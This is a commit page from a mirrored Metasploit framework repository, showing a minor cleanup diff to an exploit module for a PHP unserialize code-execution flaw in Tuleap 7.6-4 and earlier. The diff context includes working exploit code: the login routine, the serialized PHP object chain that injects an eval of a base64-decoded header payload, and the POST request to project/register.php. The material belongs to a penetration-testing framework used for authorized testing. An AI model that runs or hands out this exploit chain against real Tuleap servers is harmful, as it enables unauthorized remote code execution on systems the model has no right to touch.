infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor cleanup

bug/bundler_fix
jvazquez-r7 2014-12-12 10:52:06 -06:00
parent 700ccc71e7
commit 4871228816
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/unix/webapp/tuleap_unserialize_exec.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Tuleap unserialize() PHP Code Execution', 'Name' => 'Tuleap Unserialize PHP Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be
abused to allow authenticated users to execute arbitrary code with the permissions of the abused to allow authenticated users to execute arbitrary code with the permissions of the
@ -53,7 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.body and res.body.to_s =~ /#{flag}/ if res and res.body and res.body.to_s =~ /#{flag}/
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end end
def do_login() def do_login()
@ -68,13 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => {'form_loginname' => username, 'form_pw' => password} 'vars_post' => {'form_loginname' => username, 'form_pw' => password}
}) })
if res and res.code == 302 unless res && res.code == 302
print_status("#{peer} - Login successful with #{username}:#{password}") fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
return res.get_cookies
end end
print_error("#{peer} - Login failed with #{username}:#{password}") print_status("#{peer} - Login successful with #{username}:#{password}")
fail_with(Failure::NoAccess, 'Login failed') res.get_cookies
end end
def exec_php(php_code) def exec_php(php_code)
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";' chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}' chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'
return send_request_cgi({ send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'project/register.php'), 'uri' => normalize_uri(target_uri.path, 'project/register.php'),
'cookie' => session_cookies, 'cookie' => session_cookies,